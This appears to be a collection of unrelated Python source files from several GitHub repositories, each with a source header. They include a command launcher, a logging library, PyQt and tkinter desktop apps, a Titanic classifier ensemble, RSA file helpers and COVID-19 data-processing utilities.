def interpret_default(self):
Clipboard().set_content(self.cmd["snippet"])
if "type-it" in self.cmd:
snippet = self.apply_directory(self.cmd["snippet"])
shell.run(f"setxkbmap ; xdotool type '{snippet}'")
shell.run(f"xdotool key Return ")
return
def copiable_part(self):
return self.cmd["snippet"]
```
#### File: search_run/ranking/ranking_generator.py
```python
from __future__ import annotations
import json
import logging
from collections import namedtuple
from typing import List, Tuple
from search_run.base_configuration import BaseConfiguration
from search_run.events.latest_used_entries import LatestUsedEntries
from search_run.observability.logger import configure_logger
logger = configure_logger()
class RankingGenerator:
"""
Write to the file all the commands and generates shortcuts
"""
ModelInfo = namedtuple("ModelInfo", "features label")
model_info = ModelInfo(["position", "key_lenght"], "input_lenght")
def __init__(self, configuration: BaseConfiguration):
self.configuration = configuration
self.cached_file = configuration.cached_filename
def generate(self):
"""
Recomputes the rank and saves the results on the file to be read
"""
entries: dict = self.load_entries()
result = []
latest_used = LatestUsedEntries().get_latest_used_keys()
used_entries = []
for used_key in latest_used:
if used_key not in entries or used_key in used_entries:
continue
used_entries.append((used_key, entries[used_key]))
del entries[used_key]
# reverse the list given that we pop from the end
used_entries.reverse()
increment = 1
for key in entries.keys():
increment += 1
if increment % 2 == 0 and len(used_entries):
used_entry = used_entries.pop()
logging.debug(f"Increment: {increment} with entry {used_entry}")
result.append(used_entry)
result.append((key, entries[key]))
return self._export_to_file(result)
def load_entries(self):
""" Loads the current state of the art of search run entries"""
return self.configuration.commands
def _export_to_file(self, data: List[Tuple[str, dict]]):
position = 1
for name, content in data:
try:
content["key_name"] = name
content["rank_position"] = position
content_str = json.dumps(content, default=tuple, ensure_ascii=True)
except BaseException:
content = content
content_str = str(content)
position = position + 1
content_str = f"{name.lower()}: " + content_str
content_str = content_str.replace("\\", "\\\\")
print(content_str)
```
#### File: search_run/search_ui/fzf_in_terminal.py
```python
import os
from search_run.observability.logger import logger
class FzfInTerminal:
"""
Renders the search ui using fzf + termite terminal
"""
FONT_SIZE = 14
PREVIEW_PERCENTAGE_SIZE = 50
HEIGHT=330
@staticmethod
def build_search_ui():
""" Assembles what is specific for the search ui exclusively"""
preview_cmd = "echo {} | cut -d ':' -f1 --complement | jq . -C "
return FzfInTerminal(height=FzfInTerminal.HEIGHT, width=1100, preview_cmd=preview_cmd)
def __init__(self, *, height, width, preview_cmd):
self.height = height
self.width = width
self.preview_cmd = preview_cmd
def run(self) -> None:
internal_cmd = f"""bash -c 'search_run ranking generate | \
fzf \
--cycle \
--no-hscroll \
--hscroll-off=0 \
--bind "alt-enter:execute-silent:(nohup search_run run_key {{}} & disown)" \
--bind "enter:execute-silent:(nohup search_run run_key {{}} & disown)" \
--bind "enter:+execute-silent:(hide_launcher.sh)" \
--bind "enter:+clear-query" \
--bind "ctrl-l:clear-query" \
--bind "ctrl-c:execute-silent:(nohup search_run clipboard_key {{}} & disown)" \
--bind "ctrl-e:execute-silent:(nohup search_run edit_key {{}} & disown)" \
--bind "ctrl-e:+execute-silent:(hide_launcher.sh)" \
--bind "ctrl-k:execute-silent:(nohup search_run edit_key {{}} & disown)" \
--bind "ctrl-k:+execute-silent:(sleep 0.2 ; hide_launcher.sh)" \
--bind "esc:execute-silent:(hide_launcher.sh)" \
--bind "ctrl-h:execute-silent:(hide_launcher.sh)" \
--bind "ctrl-r:reload:(search_run ranking generate)" \
--bind "ctrl-n:reload:(search_run nlp_ranking get_read_projection_rank_for_query {{q}})" \
--bind "ctrl-t:execute-silent:(notify-send test)" \
--bind "ctrl-q:execute-silent:(notify-send {{q}})" \
--bind "ctrl-d:abort" \
--preview "{self.preview_cmd}" \
--preview-window=right,{FzfInTerminal.PREVIEW_PERCENTAGE_SIZE}%,wrap \
--reverse -i --exact --no-sort'
"""
self._launch_terminal(internal_cmd)
def _launch_terminal(self, internal_cmd: str):
launch_cmd = f"""ionice -n 3 nice -19 kitty \
--title=launcher -o remember_window_size=n \
-o initial_window_width={self.width} \
-o initial_window_height={self.height} \
-o font_size={FzfInTerminal.FONT_SIZE} \
{internal_cmd}
"""
logger.info(f"Command performed:\n {internal_cmd}")
result = os.system(launch_cmd)
if result != 0:
raise Exception("Search run fzf projection failed")
```
#### File: search_run/tests/test_serialize.py
```python
import unittest
import pytest
from search_run.context import Context
from search_run.interpreter.main import Interpreter
from tests.utils import build_config
@pytest.mark.skipif(
True,
reason="not ready yet",
)
class SerializeTestCase(unittest.TestCase):
def test_cmd(self):
config = build_config({"test jean": "pwd"})
interpreter = Interpreter(config, Context())._get_interpeter("test jean")
result = interpreter.serialize_entry()
assert result == '"pwd": {"cmd": "pwd"}'
```
|
{
"source": "jeanCarlosDev/heimdall-logger",
"score": 3
}
|
#### File: heimdall_logger/format_log/template.py
```python
class Pattern(object):
"""
[summary]
"""
@staticmethod
def default() -> str:
"""[summary]
Returns:
pattern (str): [{level}][{datetime}] - {transaction} - {project_name}.{class_name}.{function_name} - _message: traceback
"""
_message = "{message}"
_title_pattern: str = "[{level}][{datetime}] - {transaction} - "
_name_pattern: str = "{project_name}.{class_name}.{function_name} - "
_loggger_pattern = f"{_title_pattern}{_name_pattern}{_message}"
pattern = _loggger_pattern
return pattern
```
#### File: providers/log_file_system/filesystem_provider.py
```python
import aiofiles
from pathlib import Path
from heimdall_logger.constants.log_output_format import Extension
class File(object):
def __init__(
self,
file_path: str,
) -> None:
"""
[summary]
Args:
file_path (str): [description]
"""
self.file_path = file_path
def write_file(self, data: str) -> None:
"""
[summary]
Args:
data (tuple): [description]
"""
_path: str = self.file_path
print("path: ", _path)
print("data: ", data)
with open(file=_path, mode="a") as out:
out.write(data)
out.write("\n")
out.flush()
out.close()
async def async_write_file(self, data: str) -> None:
"""
[summary]
Args:
data (tuple): [description]
"""
_path: str = self.file_path
async with aiofiles.open(file=_path, mode="a") as out:
await out.writelines(data)
await out.writelines("\n")
await out.flush()
await out.close()
```
#### File: heimdall_logger/utils/probe.py
```python
from typing import List, Tuple
from inspect import FrameInfo
class Probe(object):
"""
[summary]
"""
@staticmethod
def inspect_namespaces_from(stack: List[FrameInfo]) -> Tuple[str, str]:
"""[summary]
Args:
stack (List[FrameInfo]): [description]
Returns:
Tuple[str, str]: [description]
"""
frame = stack[1]
frame_info = frame[0]
self_object = frame_info.f_locals.get(
'self',
None
)
class_name = self_object.__class__.__name__ if self_object else frame[1]
function_name = frame[3]
return class_name, function_name
```
|
{
"source": "Jeancasoto/ThePlaceToBet",
"score": 2
}
|
#### File: Jeancasoto/ThePlaceToBet/manageTeam.py
```python
from PyQt4 import QtCore, QtGui
from couchdb.mapping import Document, TextField, IntegerField, Mapping
from couchdb.mapping import DictField, ViewField, BooleanField, ListField
from couchdb import Server
import couchdb
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName(_fromUtf8("Dialog"))
Dialog.resize(688, 506)
self.label_2 = QtGui.QLabel(Dialog)
self.label_2.setGeometry(QtCore.QRect(40, 50, 251, 21))
font = QtGui.QFont()
font.setFamily(_fromUtf8("FreeSerif"))
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.label_2.setFont(font)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.lineEdit = QtGui.QLineEdit(Dialog)
self.lineEdit.setGeometry(QtCore.QRect(320, 50, 251, 29))
self.lineEdit.setObjectName(_fromUtf8("lineEdit"))
self.listView = QtGui.QListView(Dialog)
self.listView.setGeometry(QtCore.QRect(30, 190, 256, 192))
self.listView.setObjectName(_fromUtf8("listView"))
self.label_3 = QtGui.QLabel(Dialog)
self.label_3.setGeometry(QtCore.QRect(30, 160, 201, 21))
font = QtGui.QFont()
font.setFamily(_fromUtf8("FreeSerif"))
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.label_3.setFont(font)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.listWidget = QtGui.QListWidget(Dialog)
self.listWidget.setGeometry(QtCore.QRect(360, 190, 256, 192))
self.listWidget.setObjectName(_fromUtf8("listWidget"))
self.label_4 = QtGui.QLabel(Dialog)
self.label_4.setGeometry(QtCore.QRect(370, 160, 201, 21))
font = QtGui.QFont()
font.setFamily(_fromUtf8("FreeSerif"))
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.label_4.setFont(font)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.pushButton = QtGui.QPushButton(Dialog)
self.pushButton.setGeometry(QtCore.QRect(450, 400, 85, 27))
self.pushButton.setObjectName(_fromUtf8("pushButton"))
self.pushButton_2 = QtGui.QPushButton(Dialog)
self.pushButton_2.setGeometry(QtCore.QRect(550, 470, 121, 27))
self.pushButton_2.setObjectName(_fromUtf8("pushButton_2"))
self.pushButton_3 = QtGui.QPushButton(Dialog)
self.pushButton_3.setGeometry(QtCore.QRect(410, 470, 121, 27))
self.pushButton_3.setObjectName(_fromUtf8("pushButton_3"))
self.recuperarJugadores = QtGui.QPushButton(Dialog)
self.recuperarJugadores.setGeometry(QtCore.QRect(70, 400, 181, 29))
self.recuperarJugadores.setObjectName(_fromUtf8("recuperarJugadores"))
#definido
self.recuperarJugadores.clicked.connect(self.recuperarEquipo)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
Dialog.setWindowTitle(_translate("Dialog", "Dialog", None))
self.label_2.setText(_translate("Dialog", "Nombre de la institucion deportiva", None))
self.label_3.setText(_translate("Dialog", "Jugadores que forman parte ", None))
self.label_4.setText(_translate("Dialog", "Agregar jugadores", None))
self.pushButton.setText(_translate("Dialog", "Agregar", None))
self.pushButton_2.setText(_translate("Dialog", "Aceptar", None))
self.pushButton_3.setText(_translate("Dialog", "Cancelar", None))
self.recuperarJugadores.setText(_translate("Dialog", "Recuperar Jugadores", None))
def recuperarEquipo(self):
serverCDB = Server()
db = serverCDB['quinelas']
lists = db.view('queries/getJugadores')
self.listWidget.clear()
for item in lists:
docTemp = item.value
print(docTemp['content']['nombre'])
jNombre = docTemp['content']['nombre']
jApellido = docTemp['content']['apellido']
#jFecha = docTemp['content']['fechaN']
#jRol = docTemp['content']['rol']
jPeso = docTemp['content']['peso']
listRow = jNombre+" "+jApellido+" - "+str(jPeso)
self.listWidget.addItem(listRow)
#for item in db.view('queries/getJugadores'):
# print(item.key._id)
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
Dialog = QtGui.QDialog()
ui = Ui_Dialog()
ui.setupUi(Dialog)
Dialog.show()
sys.exit(app.exec_())
```
#### File: Jeancasoto/ThePlaceToBet/memame.py
```python
from random import randint
equipos = ['A','B','C','D','E','F','G','H','I','J','K','M','N','O','P']
contador_jornada =1
#existe una lista de los enfrentamientos ya disputados donde no pueden disputarse mas de 1 vez por temporada
#def enfrentamientos(self):
lista_partidos_totales =[]
#cada jornada tiene 14 partidos (n-1)
jornada =contador_jornada
#existen equipos locales y visitantes
for i in range(len(equipos)):
lista_partidos = []
while len(lista_partidos) <14:
ran1=randint(0,len(equipos)-1)
ran2=randint(0,len(equipos)-1)
partido = equipos[ran1]+"-"+equipos[ran2]
if partido not in lista_partidos_totales:
print "No se ha jugado en otra fecha"
lista_partidos_totales.append(partido)
if partido not in lista_partidos:
print ("No se ha jugado esta jornada")
lista_partidos.append(partido)
else:
print "El partido ya se jugo en esta jornada "
else:
print 'El partido ya se jugo en otra fecha aparentemente'
print "Jornada-> ", contador_jornada
print "Lista partidos:"
#for j in len(lista_partidos):
# print 'Juego:'+j+" "+lista_partidos[j]
print lista_partidos
contador_jornada+=1
```
|
{
"source": "jean-charles-gibier/TrafficLights",
"score": 3
}
|
#### File: TrafficLights/tests/test_trafficlights.py
```python
import unittest
from trafficlights.trafficlight import Trafficlight
class MyTestTrafficlights(unittest.TestCase):
def test_simple_instance(self):
# Test "Créer un nouveau feu dans un état spécifié"
traffic = Trafficlight("UK", current="rouge")
# Test "Connaître l'état du feu"
self.assertEqual(traffic.get_current(), "rouge")
# ajout des états & transitions UK
traffic.add("next", "rouge", "rouge_et_jaune")
traffic.add("next", "rouge_et_jaune", "vert")
traffic.add("next", "vert", "jaune")
traffic.add("next", "jaune", "rouge")
# Test "Passer le feu au prochain état de la séquence"
traffic.next()
# on doit passer de rouge à "rouge_et_jaune"
self.assertEqual(traffic.get_current(), "rouge_et_jaune")
# prochaine séquence (cas nominal passant)
traffic.set_current("vert")
self.assertEqual(traffic.get_current(), "vert")
# forcer la prochaine séquence (cas d'erreur)
traffic.set_current("rouge")
# la valeur est restée la même
self.assertEqual(traffic.get_current(), "vert")
if __name__ == "__main__":
unittest.main()
```
|
{
"source": "Jeanchichi/Python",
"score": 3
}
|
#### File: Python/Notepad/library.py
```python
from tkinter import *
import os
savedFile = {1:""}
class Win:
def create(self):
self.master = Tk()
self.master.title("Notepad")
self.master.geometry("720x480")
self.master.minsize(720, 480)
self.master.config(background='#272C35')
def add_text(self):
self.content = Text(self.master, font=("arail", 11), bg='#272C35', fg='#fff', width='720', height='480')
self.content.pack(expand=1, fill='both')
def generate(self):
self.master.mainloop()
def add_menu(self):
menuBar = Menu(self.master)
menuFichier = Menu(menuBar, tearoff=0)
menuBar.add_cascade(label="File", menu=menuFichier)
menuFichier.add_command(label="New", command=self.new)
menuFichier.add_command(label="Open", command=self.fopen)
menuFichier.add_command(label="Save", command=self.save)
menuFichier.add_command(label="Save as", command=self.saveAs)
menuFichier.add_command(label="Exit", command=self.quitter)
self.master.config(menu=menuBar)
menuEdition = Menu(menuBar, tearoff=0)
menuBar.add_cascade(label="Edit", menu=menuEdition)
menuEdition.add_command(label="Cancel")
menuEdition.add_command(label="Restore")
menuEdition.add_command(label="Copy", command=self.copy)
menuEdition.add_command(label="Cut", command=self.cut)
menuEdition.add_command(label="Paste", command=self.past)
menuOutils = Menu(menuBar, tearoff=0)
menuBar.add_cascade(label="Tools", menu=menuOutils)
menuOutils.add_command(label="Preferences")
menuAide = Menu(menuBar, tearoff=0)
menuBar.add_cascade(label="Help", menu=menuAide)
menuAide.add_command(label="About")
def quitter(self):
self.master.quit()
def new(self):
os.popen("python main.py")
def fopen(self):
file = self.master.filename = filedialog.askopenfilename(initialdir="/", title="Select File", filetypes=(
("Text Files", "*.txt"), ("all files", "*.*")))
fp = open(file, "r")
r = fp.read()
self.content.insert(1.0, r)
def saveAs(self):
# create save dialog
fichier = self.master.filename = filedialog.asksaveasfilename(initialdir="/",
title="Enregistrer Sous\ ", filetypes=(
("Fichier Texte", "*.txt"), ("Tous les fichiers", "*.*")))
fichier = fichier + ".txt"
# Utilisation du dictionnaire pour stocker le fichier
savedFile[1] = fichier
f = open(fichier, "w")
s = self.content.get("1.0", END)
f.write(s)
f.close()
def save(self):
if savedFile[1] == "":
self.saveAs()
else:
f = open(savedFile[1], "w")
s = self.content.get("1.0", END)
f.write(s)
f.close()
def copy(self):
self.content.clipboard_clear()
self.content.clipboard_append(self.content.selection_get())
def past(self):
self.content.insert(INSERT, self.content.clipboard_get())
def cut(self):
self.copy()
self.content.delete("sel.first", "sel.last")
```
#### File: Python/QR-Code-Generator/main.py
```python
import pyqrcode
from tkinter import *
import tkinter.ttk as ttk
from ttkthemes import ThemedTk
from PIL import Image,ImageTk
win = ThemedTk(theme="equilux")
win.title("QR Code Generator")
win.config(background="#181818")
def Generate():
text = entryl.get()
qr = pyqrcode.create(text)
file_name = "my qrcode"
save_path = r'C:\Users\Jeceey\Downloads\ '
name = save_path+file_name+'.png'
qr.png(name, scale=10)
image = Image.open(name)
image = image.resize((400, 400), Image.ANTIALIAS)
image = ImageTk.PhotoImage(image)
win.imagelabel.config(image=image)
win.imagelabel = image
text = ttk.Label(win, text= "Enter text or link :")
text.grid(row=0, column=0, padx=0, pady=3)
entryl = ttk.Entry(win, width=40)
entryl.grid(row=0, column=1, padx=3, pady=3)
button = ttk.Button(win, text="Generate", command=Generate)
button.grid(row=0, column=2, padx=3, pady=3)
show_qr = ttk.Label(win, text="QR Code :")
show_qr.grid(row=1, column=0, padx=3, pady=3)
win.imagelabel = ttk.Label(win, background='#181818')
win.imagelabel.grid(row=2, column=0, padx=3, pady=3, columnspan=3)
win.mainloop()
```
#### File: Python/URL-Shortener/main.py
```python
import pyshorteners
import tkinter as tk
from tkinter import ttk
from tkinter import *
from tkinter.messagebox import showinfo
win = tk.Tk()
win.title("URL Shortener")
def short():
url = entry_url.get()
shorted_url = pyshorteners.Shortener()
url_info = shorted_url.tinyurl.short(url)
entry_url.delete(0, END)
entry_url.insert(0, url_info)
url_label = tk.Label(win, text="Enter URL Here :")
url_label.grid(row=0, column=0)
entry_url = tk.Entry(win, width=30, bg="#69BEF6", bd=2)
entry_url.grid(row=0, column=1, padx=5, pady=5)
button = ttk.Button(win, text="Short", command=short)
button.grid(row=1, column=0, columnspan=2)
win.mainloop()
```
|
{
"source": "JeanCHilger/kaggle-titanic-challenge",
"score": 3
}
|
#### File: JeanCHilger/kaggle-titanic-challenge/main.py
```python
import csv
import pandas as pd
import random
from sklearn.metrics import classification_report
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from sklearn.svm import SVC
from sklearn.naive_bayes import GaussianNB, BernoulliNB
from sklearn.linear_model import SGDClassifier, LogisticRegressionCV
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.ensemble import AdaBoostClassifier
from sklearn.ensemble import VotingClassifier
from sklearn.neural_network import MLPClassifier
raw_data = pd.read_csv('./data/train.csv')
test_data = pd.read_csv('./data/test.csv')
##########################
# Data preprocessing
##########################
used_features = [
'Pclass',
# 'Name',
'Sex',
'Age',
'SibSp',
'Parch',
# 'Ticket',
'Fare',
# 'Cabin',
'Embarked'
]
label_encoder = LabelEncoder()
for dataset in [raw_data, test_data]:
# Imput missing values
dataset['Age'].fillna(dataset['Age'].median(), inplace = True)
dataset['Fare'].fillna(dataset['Fare'].median(), inplace = True)
# Remove remaining rows with nulls
dataset.dropna(subset=['Embarked'], axis=0, inplace=True)
# Encode features to discrete values
dataset['Sex'] = label_encoder.fit_transform(dataset['Sex'])
dataset['Embarked'] = label_encoder.fit_transform(dataset['Embarked'])
# TODO: infer new features?
# Split data into train and test
raw_y = raw_data.Survived
raw_X = raw_data[used_features]
X_train, X_test, y_train, y_test = train_test_split(
raw_X,
raw_y,
test_size=0.2,
random_state=1
)
##########################
# Model definition
##########################
def generate_svm_models(n_models=4):
'''
Creates and returns SVM models.
The parameters of the created models are
randomic choosen.
'''
models = []
for i in range(n_models):
models.append(
SVC(
C=random.uniform(0.9, 1.7),
kernel=random.choice(['linear', 'poly', 'rbf', 'sigmoid']),
# degree=random.randint(3, 4),
gamma=random.choice(['scale', 'auto'])
)
)
return models
model_titles = [
'Random Forest',
'Gradient Boost',
'Ada Boost',
'Multi-layer Perceptron',
'Gaussian NB',
'Bernoulli NB',
'Logistic Regression',
'SGD Classification',
'SVM 1',
'SVM 2',
'SVM 3',
]
models = [
RandomForestClassifier(
n_estimators=100,
random_state=1
),
GradientBoostingClassifier(
n_estimators=100,
random_state=1
),
AdaBoostClassifier(
n_estimators=50,
random_state=1
),
MLPClassifier(
max_iter=300
),
GaussianNB(),
BernoulliNB(),
LogisticRegressionCV(),
SGDClassifier(),
]
for svc_model in generate_svm_models(3):
models.append(svc_model)
models_ensemble = VotingClassifier(
estimators=[tuple(pair) for pair in zip(model_titles, models)]
)
models_ensemble.fit(X_train, y_train)
##########################
# Model evaluation
##########################
y_pred = models_ensemble.predict(X_test)
print('Ensemble Model')
print(classification_report(y_test, y_pred))
print()
##########################
# Submission
##########################
with open('submission.csv', 'w') as submission_file:
writer = csv.writer(submission_file)
indexes = test_data['PassengerId']
writer.writerow(['PassengerId', 'Survived'])
for i in range(len(y_pred)):
writer.writerow([indexes[i], y_pred[i]])
```
|
{
"source": "jeanchilger/rsa",
"score": 4
}
|
#### File: rsa/utils/file_helper.py
```python
import shutil
from typing import Union
from pathlib import Path
def _get_path(path: Union[str, Path]) -> Path:
"""
Produces a Path object for the given string path.
If input is already a Path object, returns it.
Args:
path (Union[str, Path]): A path representation,
string or Path object.
Returns:
Path: Path object.
"""
if type(path) == str:
return Path(path.replace("\\", "/"))
return path
def create_dir(path: Union[str, Path]) -> None:
"""
Creates a folder, if not exists, at the given location.
Parent folders that don't exists are also created.
Args:
path (Union[str, Path]): Path to create a new directory.
"""
_path = _get_path(path)
if not _path.exists():
_path.mkdir(parents=True)
def create_file(path: Union[str, Path]) -> None:
"""
Creates an empty file at the given location.
Args:
path (Union[str, Path]): Path where the file should be created.
"""
_path = _get_path(path)
_path.touch()
def is_path(path: Union[str, Path]) -> bool:
"""
Returns whether or not the given path is a valid path.
To be valid, a path must lead to an existing location
and can't be an arbitrary text string.
Args:
path (Union[str, Path]): Path to check validity
Returns:
bool: True if given path is valid. False otherwise.
"""
try:
return _get_path(path).exists()
except:
return False
def read_txt_file(path: Union[str, Path]) -> str:
"""
Reads a file as plain text, returning the contents as a string.
Args:
path (Union[str, Path]): Path to file.
Returns:
str: File contents as plain text.
"""
_path = _get_path(path)
with open(_path, "r") as txt_file:
return txt_file.read().strip()
def write_txt_file(path: Union[str, Path], content: str) -> None:
"""
Writes the given content to the file at given location
as plain text.
Args:
path (Union[str, Path]): Path to file.
content (str): Text to write to file.
"""
_path = _get_path(path)
with open(_path, "w") as txt_file:
txt_file.write(content)
```
|
{
"source": "JeanClaudeR/COVID19_Trends_by_Age",
"score": 3
}
|
#### File: COVID19_Trends_by_Age/src/helpers.py
```python
import numpy as np
from datetime import date, timedelta
# functions for regression
from sklearn.linear_model import Ridge
from sklearn.preprocessing import PolynomialFeatures
from sklearn.pipeline import make_pipeline
from src.mysettings import firsts_of_the_month
def delete_spaces(s):
"""Deletes all the spaces of a string
Parameters:
-----------
s : str
Returns
-----------
The corresponding string
"""
s = ''.join(i for i in s if i != ' ')
return s
def time_delta(date1,date2):
"""Gives the number of days between two dates
Parameters:
-----------
-date1 : str
the first date (format : 'DD MM YYYY')
-date2 : str
the second date (format : 'DD MM YYYY')
Returns:
-----------
Either -1 (wrong date format)
Or the number of days between the two dates (int)
"""
try:
day1, month1, year1 = int(date1[:2]), int(date1[3:5]), int(date1[6:10])
day2, month2, year2 = int(date2[:2]), int(date2[3:5]), int(date2[6:10])
delta = int((date(year2, month2, day2) - date(year1, month1, day1)).days)
except:
delta = -1
return delta
def computeDatecodeFromGap(n):
"""Computes a Datecode from a gap_in_day value
Parameters:
-----------
n : int
the number of days between the wanted date and 2020.01.01
Returns
-----------
datecode : int
the corresponding datecode
"""
D = date(2020, 1, 1) + timedelta(days = n)
D = str(D)
datecode = int(D[:4] + D[5:7] + D[8:10])
return datecode
def ageRange(row):
"""Gives the age range label for histogram
-----------
row : pandas Series
row of a dataset
Returns
-----------
label : str
the corresponding label
"""
if row.Age == 100:
label = '100-104'
else:
label = str(row.Age) + '-' + str(row.Age + 9)
return label
def regionError(df, C, R):
"""Detects if a selected region is not part of one of the selected countries
Parameters:
-----------
df : Pandas DataFrame
the original dataset
C : str list
list of selected countries
R : str list
list of selected regions
Returns
-----------
bool
True if the error is detected
"""
if C == None:
C = ['USA']
available_regions = list(regions_of_country(df, C)) + ['All_regions', 'All']
for region in R:
if not(region in available_regions):
return True
return False
def adaptMetricsInterval(metrics, interval):
"""Transforms the selected metrics and the time interval (daily, weekly, etc.) into a understandable metrics
Parameters:
-----------
metrics : str list
list of cumulatives selected metrics
interval : str
time intervall (daily, weekly, biweekly, monthly, or none)
Returns
-----------
M : str list
the list of correspondiing metrics
"""
if interval == None:
I = ''
else:
I = interval
M = [I + metric if metric in ['Cases', 'Deaths', 'Tests']
else metric for metric in metrics ]
return M
def adaptDataframeHistogram(df, max_gap):
"""Builds dataframe used to display histogram
-----------
df : Pandas DataFrame
the original dataframe
max_gap : int
the latest authorized gap_in_day value
Returns
-----------
df : Pandas DataFrame
the corresponding dataframe
"""
df0 = df[df['gap_in_day'] <= max_gap].copy()
for age in range(0, 101, 10):
df1 = df0[df0['Age'] == age]
df0 = df0.drop(list(df1.index.values)[:-1])
return df0
def dfadaptDateRange(df, start_date, end_date):
"""Slices dataframe keeping values between start-date and end_date
Parameters:
-----------
-df : Pandas DataFrame
the dataset, asuming that it is sorted by date (with "Date_code")
-start_date : str
format : YYYY MM DD
-end_date : str
format : YYYY MM DD
Returns:
-----------
The coresponding dataset (pandas DataFrame)
"""
day1, month1, year1 = start_date[8:10], start_date[5:7], start_date[:4]
day2, month2, year2 = end_date[8:10], end_date[5:7], end_date[:4]
datecode1, datecode2 = int(year1 + month1 + day1), int(year2 + month2 + day2)
df0 = df[df['Date_code'] <= datecode2]
df0 = df0[df0['Date_code'] >= datecode1]
return df0
def computeRatio(indicator1, indicator2):
"""Computation of ratio of 2 inidcators.
Parameters:
-----------
indicator1 : float
indicator1 : float
Returns:
--------
Either None (division by zero)
Or the computed ratio (float)
"""
try:
ratio = indicator1 / indicator2
except ZeroDivisionError:
return None
else:
return ratio
def computeDateFormat(row):
"""Converts Date_code row into dates with US format (YYYY MM DD)
Parameters:
-----------
row : pandas Series
row of a dataset
Returns:
-----------
The date with the corresponding format (str)
"""
s = str(row.Date_code)
return s[:4] + '/' + s[4:6] + '/' + s[6:8]
def computeDatecode(row):
"""Creates a datecode (which permits sorting the dates ascending) for each row in the original dataset.
Parameters:
-----------
row : pandas Series
row of a dataset
Returns:
-----------
Either None (wrong date format)
Or the computed code (int)
"""
try:
day, month, year = row.Date[:2], row.Date[3:5], row.Date[6:10]
N = int(year + month + day)
except:
N = None
return N
def computeSource(s):
"""Deletes the non digit leters of a word (used to identify
different sources of data in the dataset)
Parameters:
-----------
row : pandas Series
row of a dataset
Returns:
-----------
The corresponding word (str)
"""
s = ''.join(i for i in s if not i.isdigit())
return s
def select_data(df, countries_list, regions_list, ages_list, genders_list):
"""Extracts from the dataset the data corresponding to many criterias.
Parameters:
-----------
df : Pandas DataFrame
dataset
countries_list : list of str
countries to be selected
regions_list : list of str
regions to be selected
ages_list : list of int
age ranges to be selected
genders_list : list of str
genders to be selected
Returns:
-----------
The corresponding dataset (pandas DataFrame)
"""
df0 = df[df['Country'].isin(countries_list)]
df1 = df0[df0['Region'].isin(regions_list)]
df2 = df1[df1['Age'].isin(ages_list)]
df3 = df2[df2['Sex'].isin(genders_list)]
return df3
def regions_of_country(df, list_of_countries):
"""Gives the list of the regions of a list of countries
Parameters:
-----------
-df : Pandas DataFrame
the original dataset
-list_of_countries : str list
the list of the countries to select
Returns:
-----------
The list of the regions (string list)
"""
if isinstance(list_of_countries, str):
list_of_countries = [list_of_countries]
L = list(
set(
df[df['Country'].isin(list_of_countries) ]['Region']
)
)
L = sorted(L)
try:
L.remove('All')
except ValueError:
pass
L = np.array(L)
return L
def meltDataframe(df):
"""Melting the df to get a 'Metric' columns with elements of metrics (list) as values
Parameters:
-----------
df : dataframe
dataframe to be transformed from wide to long format
Returns:
--------
df : Pandas dataframe
The coresponding dataframe
"""
df_long = df.melt(
id_vars = ['Date', 'Sex', 'Country', 'Region', 'Age', 'Date_code'],
var_name = 'Metric',
value_name = 'Value',
value_vars = ['Cases', 'Deaths', 'Tests', 'CFR', 'Tests by cases']
)
df_long = df_long[df_long['Value'] > 0.001]
return df_long
def compute_daily_metrics(df, metric):
"""Computes daily metrics from cumulative ones and inserts it in data frame in 'Metric' column
Parameters:
-----------
df : Pandas DataFrame
the original dataset
metric : the cumulative metric to use for computing daily one
Returns
-----------
df : Pandas Dataframe
the correspunding dataframe
"""
df0 = df[df['Metric'] == metric]
new_metric = 'Daily ' + metric
identities = list(
set(
df0['Country - Region - Age - Gender'].values
)
)
for ide in identities:
print(ide)
df1 = df0[df0['Country - Region - Age - Gender'] == ide]
L = [(index, row) for index, row in df1.iterrows()]
new_rows_list = []
for row_number in range(len(L) - 1):
row0 = L[row_number][1]
row1 = L[row_number+1][1]
for j in range(row0.gap_in_day + 1, row1.gap_in_day + 1):
new_row = row0.copy()
new_row.gap_in_day = j
new_row.Metric = new_metric
try:
new_row.Value = int(
100 * (row1.Value - row0.Value) / (row1.gap_in_day - row0.gap_in_day)
) / 100
except ZeroDivisionError:
new_row.Value = None
new_rows_list.append(new_row)
for i in range(len(new_rows_list)):
new_row = new_rows_list[i]
df.loc[-1] = new_row
df.index = df.index + 1
print('daily metric computed')
return df
def start_first_monday(df):
"""Slices the dataset keeping data dated after the first monday available
Parameters:
-----------
df : Pandas DataFrame
the original dataset
Returns
-----------
df : Pandas DataFrame
the corresponding dataset
"""
first_date_gap = df.iloc[0].gap_in_day
next_monday_gap = first_date_gap + (4 - first_date_gap % 7) % 7
df0 = df[df['gap_in_day'] >= next_monday_gap]
return df0
def compute_weekly_metrics(df, metric):
"""Computes weekly metrics from daily ones and inserts it in data frame in 'Metric' column
Parameters:
-----------
df : Pandas DataFrame
the original dataset
metric : the metric to use for computing weekly one
Returns
-----------
df : Pandas Dataframe
the correspunding dataframe
"""
df0 = df[df['Metric'] == 'Daily ' + metric]
new_metric = 'Weekly ' + metric
identities = list(
set(
df0['Country - Region - Age - Gender'].values
)
)
for ide in identities:
df1 = df0[df0['Country - Region - Age - Gender'] == ide]
df1 = start_first_monday(df1)
L = [row for _, row in df1.iterrows()][1:]
for i in range((len(L) - 1) // 7):
value = sum([row.Value for row in L[7 * i: 7 * i + 7]])
for j in range(7 * i + 1, 7 * i + 8):
if j % 7 == 0:
row = L[j]
new_row = row.copy()
